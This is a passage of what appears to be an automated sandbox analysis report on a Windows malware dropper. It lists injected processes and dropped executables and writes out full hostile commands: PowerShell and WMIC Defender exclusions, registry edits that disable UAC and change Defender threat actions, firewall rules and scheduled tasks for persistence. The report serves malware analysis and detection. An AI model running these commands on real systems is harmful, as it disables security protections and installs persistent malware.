WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 WMIC.exe Token: 36 2012 WMIC.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeDebugPrivilege 2760 powershell.EXE Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 648 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3936 WMIC.exe Token: SeIncreaseQuotaPrivilege 3936 WMIC.exe Token: SeSecurityPrivilege 3936 WMIC.exe Token: SeTakeOwnershipPrivilege 3936 WMIC.exe Token: SeLoadDriverPrivilege 3936 WMIC.exe Token: SeSystemtimePrivilege 3936 WMIC.exe Token: SeBackupPrivilege 3936 WMIC.exe Token: SeRestorePrivilege 3936 WMIC.exe Token: SeShutdownPrivilege 3936 WMIC.exe Token: SeSystemEnvironmentPrivilege 3936 WMIC.exe Token: SeUndockPrivilege 3936 WMIC.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
ubk.3.exepid process 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
ubk.3.exepid process 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe 1824 ubk.3.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
run.exeMSBuild.exepid process 1320 run.exe 1320 run.exe 5072 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exeCasPol.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exek9N2iLGgH5IXrwnqkCfnYGEa.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exeInstall.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exedescription pid process target process PID 1360 wrote to memory of 892 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe powershell.exe PID 1360 wrote to memory of 892 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe powershell.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 1628 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 1628 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1360 wrote to memory of 1628 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 5020 wrote to memory of 416 5020 CasPol.exe rYQHmcFpMZCI2lLMVlsQIqov.exe PID 5020 wrote to memory of 416 5020 CasPol.exe rYQHmcFpMZCI2lLMVlsQIqov.exe PID 5020 wrote to memory of 416 5020 CasPol.exe rYQHmcFpMZCI2lLMVlsQIqov.exe PID 5020 wrote to memory of 3976 5020 CasPol.exe 2QqwdmEprG41dAF4eJbsw6U9.exe PID 5020 wrote to memory of 3976 5020 CasPol.exe 2QqwdmEprG41dAF4eJbsw6U9.exe PID 5020 wrote to memory of 3976 5020 CasPol.exe 2QqwdmEprG41dAF4eJbsw6U9.exe PID 5020 wrote to memory of 3724 5020 CasPol.exe lTSs1ST8HHlAZfEbkonjc9k7.exe PID 5020 wrote to memory of 3724 5020 CasPol.exe lTSs1ST8HHlAZfEbkonjc9k7.exe PID 5020 wrote to memory of 3724 5020 CasPol.exe lTSs1ST8HHlAZfEbkonjc9k7.exe PID 5020 wrote to memory of 1028 5020 CasPol.exe k9N2iLGgH5IXrwnqkCfnYGEa.exe PID 5020 wrote to memory of 1028 5020 CasPol.exe k9N2iLGgH5IXrwnqkCfnYGEa.exe PID 5020 wrote to memory of 1028 5020 CasPol.exe k9N2iLGgH5IXrwnqkCfnYGEa.exe PID 5020 wrote to memory of 1380 5020 CasPol.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 5020 wrote to memory of 1380 5020 CasPol.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 5020 wrote to memory of 1380 5020 CasPol.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 1996 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 1996 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 1996 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1028 wrote to memory of 5012 1028 k9N2iLGgH5IXrwnqkCfnYGEa.exe Install.exe PID 1028 wrote to memory of 5012 1028 k9N2iLGgH5IXrwnqkCfnYGEa.exe Install.exe PID 1028 wrote to memory of 5012 1028 k9N2iLGgH5IXrwnqkCfnYGEa.exe Install.exe PID 1380 wrote to memory of 4076 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 4076 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 4076 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 1168 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 1168 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1380 wrote to memory of 1168 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1168 wrote to memory of 2668 1168 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1168 wrote to memory of 2668 1168 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 1168 wrote to memory of 2668 1168 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 88ZAQZnLv9RZwKEYFq5E7vJ2.exe PID 5012 wrote to memory of 1044 5012 Install.exe cmd.exe PID 5012 wrote to memory of 1044 5012 Install.exe cmd.exe PID 5012 wrote to memory of 1044 5012 Install.exe cmd.exe PID 5020 wrote to memory of 4732 5020 CasPol.exe cZ66OwyuU2YlIR1ARlg2uowi.exe PID 5020 wrote to memory of 4732 5020 CasPol.exe cZ66OwyuU2YlIR1ARlg2uowi.exe PID 572 wrote to memory of 4372 572 forfiles.exe cmd.exe PID 572 wrote to memory of 4372 572 forfiles.exe cmd.exe PID 572 wrote to memory of 4372 572 forfiles.exe cmd.exe PID 4372 wrote to memory of 3736 4372 cmd.exe reg.exe PID 4372 wrote to memory of 3736 4372 cmd.exe reg.exe PID 4372 wrote to memory of 3736 4372 cmd.exe reg.exe PID 2732 wrote to memory of 1844 2732 forfiles.exe cmd.exe PID 2732 wrote to memory of 1844 2732 forfiles.exe cmd.exe PID 2732 wrote to memory of 1844 2732 forfiles.exe cmd.exe PID 1844 wrote to memory of 3900 1844 cmd.exe reg.exe PID 1844 wrote to memory of 3900 1844 cmd.exe reg.exe PID 1844 wrote to memory of 3900 1844 cmd.exe reg.exe PID 1760 wrote to memory of 3868 1760 forfiles.exe cmd.exe PID 1760 wrote to memory of 3868 1760 forfiles.exe cmd.exe PID 1760 wrote to memory of 3868 1760 forfiles.exe cmd.exe PID 3868 wrote to memory of 3020 3868 cmd.exe reg.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe"C:\Users\Admin\AppData\Local\Temp\3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe"1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:892 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Users\Admin\Pictures\rYQHmcFpMZCI2lLMVlsQIqov.exe"C:\Users\Admin\Pictures\rYQHmcFpMZCI2lLMVlsQIqov.exe"3⤵
- Executes dropped EXE
PID:416 -
C:\Users\Admin\AppData\Local\Temp\ubk.0.exe"C:\Users\Admin\AppData\Local\Temp\ubk.0.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 30125⤵
- Program crash
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\ubk.2\run.exe"C:\Users\Admin\AppData\Local\Temp\ubk.2\run.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- Suspicious use of SetWindowsHookEx
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\ubk.3.exe"C:\Users\Admin\AppData\Local\Temp\ubk.3.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵PID:3936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 5244⤵
- Program crash
PID:3704 -
C:\Users\Admin\Pictures\2QqwdmEprG41dAF4eJbsw6U9.exe"C:\Users\Admin\Pictures\2QqwdmEprG41dAF4eJbsw6U9.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2320 -
C:\Users\Admin\Pictures\2QqwdmEprG41dAF4eJbsw6U9.exe"C:\Users\Admin\Pictures\2QqwdmEprG41dAF4eJbsw6U9.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:1460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2588 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:772
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
PID:1524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4092 -
C:\Users\Admin\Pictures\lTSs1ST8HHlAZfEbkonjc9k7.exe"C:\Users\Admin\Pictures\lTSs1ST8HHlAZfEbkonjc9k7.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3680 -
C:\Users\Admin\Pictures\lTSs1ST8HHlAZfEbkonjc9k7.exe"C:\Users\Admin\Pictures\lTSs1ST8HHlAZfEbkonjc9k7.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2036 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:220
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:1484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4540 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
PID:4088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3472 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5056 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2472
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Modifies data under HKEY_USERS
PID:2052 -
C:\Users\Admin\Pictures\k9N2iLGgH5IXrwnqkCfnYGEa.exe"C:\Users\Admin\Pictures\k9N2iLGgH5IXrwnqkCfnYGEa.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Users\Admin\AppData\Local\Temp\7zS8712.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:1044
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
- Suspicious use of WriteProcessMemory
PID:4372 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:3736
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:3900
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:3020
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:228
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:4220
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:2280
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:2876
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:5004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:3112
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:4592
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:1868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 18:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8712.tmp\Install.exe\" Wt /XpTdidYNoS 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2732 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"5⤵PID:2692
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt6⤵PID:4176
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt7⤵PID:3196
-
C:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exe"C:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exeC:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6ffce1d0,0x6ffce1dc,0x6ffce1e84⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\88ZAQZnLv9RZwKEYFq5E7vJ2.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\88ZAQZnLv9RZwKEYFq5E7vJ2.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4076 -
C:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exe"C:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1380 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240429183431" --session-guid=469f58b3-1649-483e-bbf1-4bab14bfdc29 --server-tracking-blob="NGEzY2RiM2VlZTcwZWYwZTY5MTMxNTkxZDg5ZDNiN2U5NjBjY2Y4MWRiZjQ5YjYyNGJkZTAyZmMyZTEzN2RmNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0NDE1NjY1Ljg5NzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMDkyNjdlZGYtOTc0Yi00YjQyLWJmMzMtNTlmOTM3OTBlZTdkIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=30050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exeC:\Users\Admin\Pictures\88ZAQZnLv9RZwKEYFq5E7vJ2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6edbe1d0,0x6edbe1dc,0x6edbe1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2668 -
